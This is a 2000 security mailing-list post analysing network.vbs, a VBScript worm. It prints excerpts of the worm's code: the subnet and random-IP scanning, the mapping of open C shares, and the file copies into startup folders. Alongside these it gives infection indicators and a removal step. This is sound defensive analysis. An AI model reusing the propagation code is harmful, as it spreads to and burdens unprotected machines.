Security Incidents mailing list archives
Lame Windows Worm
From: cbrenton () SOVER NET (Chris Brenton)
Date: Sat, 26 Feb 2000 23:23:04 -0500
Greetings all,
I had a friend running WinProxy on a Windows 98 machine run across a
file named network.vbs in their startup group. I ran it past the
Dartmouth collage security institute and this is what they came up with.
The attack is somewhat lame but has the potential to waste quite a bit
of bandwidth. Since it was found in the wild, its obviously making the
rounds.
The script appears to be a direct rip off of the
c:\windows\samples\wsh\network.vbs script included with Windows 98.
Guess the purp could not even be bothered to write their own code. ;)
Effected Systems: Windows 95 and Windows 98
Method of infection: File copy via file shares
Special conditions required: Drive "C" must be shared read/write with no
password
How to tell if you are infected: Look for network.vbs in the startup
group
How to clean it: Remove network.vbs from the startup group ;)
Code analysis: Interesting bits pasted below with added commentary
------
do
do while driveconnected = "0"
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive "j:", sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
loop
The main purpose of the script can be seen here. Its designed to create
share mappings with other Windows systems and then copy over files.
------
function checkfile()
If (fso1.fileexists("c:\network.log")) then
fso1.deletefile("c:\network.log")
createlogfile()
The script creates a log file. This gives a good clue as to infection.
If you have this file on your system, you may be infected.
------
fso.copyfile "c:\network.vbs", "j:\"
fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\wind95\"
Geesh, how many copies of the file do you need to infect the target
system? Lines 2 and 6 would be sufficient. Speaks of an amateur that
didn't really know what they where doing so they just kept adding copy
jobs till it worked consistently. ;)
A couple of points worth noting:
The entire "C" drive must be shared to get infected
This script is targeted at Windows 95 & 98 systems
You can see if you are infected by looking for network.vbs in startup
group
------
function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function
function shareformat()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function
Here's where things start to get nasty. The system figures out who to
infect next by enumerating the local address and walking the subnet.
This should trigger any IDS system tuned in to hosts performing a
service scan for NetBIOS/IP.
------
function randum()
rand = int((254 * rnd) + 1)
end function
function randaddress()
if count < 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
Guess its not enough to infect the local subnet, this script then goes
out and probes random hosts in the 199.x.x.x to 215.x.x.x subnet ranges.
This is done 50 times before moving on to the section of the script
below.
------
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
myfile.writeLine("Subnet: " & octa & dot & octb & dot & octc & dot &
"0")
end function
Start checking random subnets and log them to the c:\network.log file.
One interesting point here is the script specifically targets x.x.x.1
addresses. Again speaks to an amateur as a .1 address will typically be
occupied by a router, not a Windows machine.
So this script is nothing severe but could be a nasty waste of bandwidth
in the wrong environment. This script could be real pain on a cable or
DSL environment. It could also be trouble in a corporate environment on
a Monday morning when everyone powers back up for the first time.
HTH,
Chris
--
**************************************
cbrenton () sover net
* Multiprotocol Network Design & Troubleshooting
http://www.amazon.com/exec/obidos/ASIN/0782120822/geekspeaknet
* Mastering Network Security
http://www.amazon.com/exec/obidos/ASIN/0782123430/geekspeaknet
Current thread:
- Lame Windows Worm Chris Brenton (Feb 26)
- <Possible follow-ups>
- Re: Lame Windows Worm .sozni (Feb 28)
- Re: Lame Windows Worm Chris Brenton (Feb 28)
